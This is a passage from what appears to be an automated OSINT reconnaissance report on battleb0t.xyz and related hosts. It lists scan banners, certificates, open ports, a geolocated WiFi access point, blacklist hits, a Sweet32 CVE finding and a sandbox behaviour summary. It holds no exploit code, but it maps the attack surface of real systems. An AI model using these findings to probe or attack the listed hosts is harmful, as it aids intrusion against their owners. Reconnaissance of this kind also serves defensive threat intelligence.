"qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:44:36 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b7:86:7e:22:b8:47:2a:2a:20:fc:69:54:4c:4c:
8d:ea:3f:a1:0c:0e:11:0f:7e:c1:26:df:52:aa:7e:
94:3a:df:e1:4c:c1:e1:54:54:7a:c2:7a:eb:d8:cc:
df:41:19:00:a3:7b:e6:18:3e:51:47:37:04:be:39:
e6:bf:91:38:96:6a:40:69:b8:63:75:51:8c:52:3a:
41:07:8f:c4:ec:e7:d6:72:77:98:6d:17:b7:fd:4c:
4c:0f:1e:e2:38:f3:1e:28:62:8d:25:cc:29:b7:fc:
af:91:3e:9d:e5:92:07:d2:8d:09:ca:64:eb:80:76:
ae:38:a2:33:49:07:84:c8:02:f9:d3:21:2b:ce:01:
78:68:73:b9:2a:22:16:eb:78:90:34:44:73:52:fa:
b4:e5:7a:78:b5:62:9e:70:95:d0:26:0e:c1:b7:b4:
12:fd:9f:10:09:67:d9:3c:f0:82:32:ed:27:d0:55:
a7:30:ce:0b:b7:0a:ef:86:ec:19:5d:c1:a0:11:f8:
d8:f7:da:51:1c:ce:c6:23:90:13:7e:ab:f3:de:c1:
8e:52:9d:26:8b:16:dc:5c:ae:23:f8:3d:43:96:47:
e1:0d:83:73:94:c2:e5:ad:91:ed:93:fe:48:67:3b:
6c:8e:00:5a:b6:2f:0f:94:18:91:b3:ed:bb:bf:d8:
25:d1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
8e:1e:a8:a7:dc:b4:b2:81:77:cc:05:85:bf:5a:da:1d:f4:11:
2f:79:e8:ea:90:50:cd:64:a1:df:43:64:b0:45:83:6a:9e:5d:
59:bc:d7:f8:c2:0e:5f:4b:d2:8c:3b:71:44:77:09:c9:00:b8:
05:73:a8:af:5c:03:95:2d:4c:ab:3f:94:8d:b8:ae:e1:f0:37:
e9:58:9a:a0:2c:5e:da:55:60:52:70:f6:59:b6:b8:74:c2:ec:
81:ab:60:cd:18:64:f8:84:94:8c:df:47:3c:58:34:38:f7:32:
95:4f:6b:ab:3c:d9:c8:9d:74:72:3d:d9:8b:b0:94:26:be:f8:
97:a5:76:6a:24:26:67:96:90:9d:13:49:6a:48:2d:e9:2e:38:
bc:3f:6a:f2:cd:6c:8d:0c:c9:e9:d6:d1:7b:0e:16:58:5f:02:
04:50:48:f9:7c:38:68:3b:60:03:bd:e1:08:78:5b:e8:18:86:
b7:4b:aa:6f:ff:a7:2b:03:04:25:27:96:1f:8f:09:53:64:fa:
5f:9b:e8:88:a7:a7:cf:f6:cb:48:fc:5c:9c:94:c2:c7:76:87:
81:e4:c9:14:d3:20:ef:9f:47:07:5f:b5:8a:d6:96:2d:57:a9:
f9:b6:6d:17:e3:16:11:39:ad:d4:74:7b:49:e0:ca:6b:a7:15:
ef:22:a3:8b
| battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SX551C65D72 (Net ID: 00:01:E3:C6:5D:72) | 50.8897, 6.0563 |
| 2023-05-12 03:32:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.17:443 | 188.114.97.0/24 |
| 2023-05-12 03:24:22 | HTTP Headers | No | Web Spider | 1 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 03:24:22 GMT", "content-type": "text/html"} | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ee2a62d9a2306-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:8080 | 188.114.97.0/24 |
| 2023-05-12 03:00:00 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jloup@gzip.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://goo.gl/uqaWYa', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_6c8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1736"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6c8_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_6c8_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_6c8_ConnHashTable<1736>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_6c8_IE_EarlyTabStart_0xaf0_Mutex"\n "IsoScope_6c8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6c8_IE_EarlyTabStart_0xaf0_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"74.208.236.106:80"\n "74.208.236.106:443"\n "172.217.12.106:443"\n "104.18.10.207:443"\n "185.199.109.153:443"\n "142.250.72.202:443"\n "142.251.214.131:443"\n "142.250.189.206:443"\n "142.251.214.130:443"\n "142.251.46.230:443"\n "142.251.46.170:443"\n "52.155.62.95:443"\n "172.217.12.118:443"\n "172.217.12.97:443"\n "142.250.189.238:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"chrisfixed.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "chrisfixed.com"\n "fe0.google.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "goo.gl"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "play.google.com"\n "query.prod.cms.msn.com"\n "stackpath.bootstrapcdn.com"\n "static.doubleclick.net"\n "teredo.ipv6.microsoft.com"\n "trenta.media"\n "www.chris-fix.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "VISITOR_INFO1_LIVEziB5upP7Wiwyoutube.com/214749286534253099523106746390550359831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "5O0LJ4LH.txt")\n Found string "VISITOR_INFO1_LIVEDU_B5bFhQnkyoutube.com/214749286534253099523106746390472234831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "DQKYX181.txt")\n Found string "VISITOR_INFO1_LIVEi1ZA35yJPt8youtube.com/214749286534253099523106746390597234831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "7JFMJ9XY.txt")\n Found string "VISITOR_INFO1_LIVE-bsB1yN3wW0youtube.com/214749286534253099523106746390784734831031237CONSENTWP.2676bayoutube.com/102431383388163210825482504061830633367" (Indicator: "dir "; File: "7E6JY8J0.txt")\n file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "function bz(a,b){var c=this;return b}bz.M="internal.enableAutoEventOnScroll";var bc=ca(["data-gtm-yt-inspected-"]),cz=["www.youtube.com","www.youtube-nocookie.com"],dz,ez=!1;" (Indicator: "dir "; File: "js_2_.js")\n Found string "www.youtube.com" (Indicator: "dir "; File: "PCAP")\n file/memory contains long string with (Indicator: "dir "; File: "SSL")\n file/memory contains long string with (Indicator: "dir "; File: "base_1_.js")\n Found string "{Bo:"r",Do:Eo()}:"youtube.player.web_20230502_00_RC00".includes("gam_native_web_video")?{Bo:"n",Do:Eo()}:"youtube.player.web_20230502_00_RC00".includes("admob_interstitial_video")?{Bo:"int",Do:Eo()}:{Bo:"j",Do:null}};" (Indicator: "dir "; File: "base_1_.js")\n Found string "By=function(a){a=g.Si(a);a=null!==a?a.split(".").reverse():null;return null===a?!1:"com"==a[0]&&a[1].match(/^youtube(?:kids|-nocookie)?$/)?!0:!1};" (Indicator: "dir "; File: "base_1_.js")\n Found string "g.Uy=function(a,b,c,d,e){Sy||Ty.set(""+a,b,{IG:c,path:"/",domain:void 0===d?"youtube.com":d,W8:void 0===e?!1:e})};" (Indicator: "dir "; File: "base_1_.js")\n Found string "g.Wy=function(a,b,c){Sy||Ty.remove(""+a,void 0===b?"/":b,void 0===c?"youtube.com":c)};" (Indicator: "dir "; File: "base_1_.js")\n Found string "sna=function(){this.j=g.hy("ALT_PREF_COOKIE_NAME","PREF");this.u=g.hy("ALT_PREF_COOKIE_DOMAIN","youtube.com");var a=g.Vy(this.j);a&&this.parse(a)};" (Indicator: "dir "; File: "base_1_.js")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"insta-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "twitter-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "fb-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "sddefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 640x480 components 3" and extension "jpg"\n "sddefault_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 640x480 components 3" and extension "jpg"\n "yt-logo_1_.png" has type "PNG image data 512 x 512 8-bit/color RGBA non-interlaced" and extension "png"\n "unnamed_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 Exif Standard: [TIFF image data little-endian direntries=1 software=Google] baseline precision 8 68x68 components 3" and extension "jpg"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{6e883627-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe5a84e0c629be7b2.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\desktop\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{6e883629-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa2a380ccf94f2bd9.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"\n "iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe5a84e0c629be7b2.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{6e883627-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{6e883629-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa2a380ccf94f2bd9.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\37nu00gp\\favicon[3].ico"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'infor |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:24 | Internet Name | No | Certificate Transparency | 0 | 1 | 1 | 0 | None | pics.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Computing websites | battleb0t.github.io |
| 2023-05-12 02:52:28 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [104.196.30.220]
https://www.virustotal.com/en/ip-address/104.196.30.220/information/ | 104.196.30.220 |
| 2023-05-12 02:58:43 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2016-2183
https://nvd.nist.gov/vuln/detail/CVE-2016-2183
Score: 7.5
Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | ayhu.xyz |
| 2023-05-12 02:54:19 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.107): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5c82adbc7b2323-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 03:00:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.61): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
